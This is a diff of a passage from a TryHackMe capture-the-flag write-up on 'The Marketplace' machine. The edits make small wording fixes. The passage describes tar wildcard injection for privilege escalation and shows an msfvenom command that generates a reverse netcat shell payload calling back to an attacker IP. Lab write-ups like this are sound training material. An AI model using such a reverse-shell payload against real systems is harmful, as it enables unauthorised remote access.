yuvalbatan/writeups/tryhackme/The_Marketplace.md

 I'll use this technique to exploit this machine and get access to "michael" user.

-For this purpose I'll use this article "https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/" under "Tar Wildcard Injection (1st method)" and will modify for my own needs:
+For this purpose I'll use this article "https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/" under "Tar Wildcard Injection (1st method)" and will modify it for my own needs:

-I'll start by generating an exploit for the reverse shell using the "msfvenom" tool:
+I'll start by generating a payload for the reverse shell using the "msfvenom" tool:
 ```bash
 msfvenom -p cmd/unix/reverse_netcat lhost=[MY-IP] lport=6666 R
 ```